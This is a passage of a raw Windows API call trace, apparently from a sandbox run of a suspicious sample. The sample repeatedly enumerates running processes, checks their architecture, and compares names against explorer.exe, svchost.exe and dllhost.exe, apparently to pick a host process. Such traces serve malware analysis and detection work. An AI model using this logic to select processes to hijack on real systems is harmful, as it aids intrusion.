dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0253.522] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0253.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0253.522] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.522] CloseHandle (hObject=0xd8) returned 1 [0253.522] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0253.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0253.523] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.523] CloseHandle (hObject=0xd8) returned 1 [0253.523] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0253.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0253.524] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.524] CloseHandle (hObject=0xd8) returned 1 [0253.524] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0253.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0253.525] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.525] CloseHandle (hObject=0xd8) returned 1 [0253.525] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0253.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0253.525] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.525] CloseHandle (hObject=0xd8) returned 1 [0253.525] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0253.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0253.526] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.526] CloseHandle (hObject=0xd8) returned 1 [0253.526] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0253.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0253.526] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.526] CloseHandle (hObject=0xd8) returned 1 [0253.526] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0253.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0253.527] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.527] CloseHandle (hObject=0xd8) returned 1 [0253.527] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0253.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0253.528] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.528] CloseHandle (hObject=0xd8) returned 1 [0253.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0253.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0253.528] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.528] CloseHandle (hObject=0xd8) returned 1 [0253.528] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0253.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0253.529] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.529] CloseHandle (hObject=0xd8) returned 1 [0253.529] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0253.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0253.529] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.529] CloseHandle (hObject=0xd8) returned 1 [0253.529] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0253.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0253.530] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.530] CloseHandle (hObject=0xd8) returned 1 [0253.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0253.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0253.530] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.530] CloseHandle (hObject=0xd8) returned 1 [0253.530] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0253.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0253.531] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.531] CloseHandle (hObject=0xd8) returned 1 [0253.531] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0253.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0253.532] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.532] CloseHandle (hObject=0xd8) returned 1 [0253.532] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0253.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0253.532] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.532] CloseHandle (hObject=0xd8) returned 1 [0253.532] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0253.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0253.533] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.533] CloseHandle (hObject=0xd8) returned 1 [0253.533] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0253.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0253.533] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.533] CloseHandle (hObject=0xd8) returned 1 [0253.533] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0253.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0253.534] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.534] CloseHandle (hObject=0xd8) returned 1 [0253.534] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0253.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0253.534] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.534] CloseHandle (hObject=0xd8) returned 1 [0253.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0253.535] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0253.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0253.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0253.536] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0253.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0253.537] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0253.538] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.538] CloseHandle (hObject=0xd8) returned 1 [0253.538] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0253.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0253.538] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.538] CloseHandle (hObject=0xd8) returned 1 [0253.538] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0253.538] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0253.538] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0253.538] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0253.539] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.539] CloseHandle (hObject=0xd8) returned 1 [0253.539] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0253.539] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.539] CloseHandle (hObject=0xd8) returned 1 [0253.539] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0253.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0253.540] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0253.540] CloseHandle (hObject=0xd8) returned 1 [0253.540] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.541] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0253.541] CloseHandle (hObject=0xd4) returned 1 [0253.541] Sleep (dwMilliseconds=0x3e8) [0254.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0254.556] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.556] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0254.556] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0254.557] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.557] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0254.557] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0254.558] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.558] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0254.558] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0254.559] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0254.559] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0254.560] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.560] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0254.560] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0254.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0254.561] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.561] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0254.561] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0254.562] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0254.562] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0254.563] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.563] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0254.563] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0254.564] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0254.564] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0254.565] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0254.565] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0254.565] CloseHandle (hObject=0xd8) returned 1 [0254.565] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0254.565] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0254.565] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0254.565] 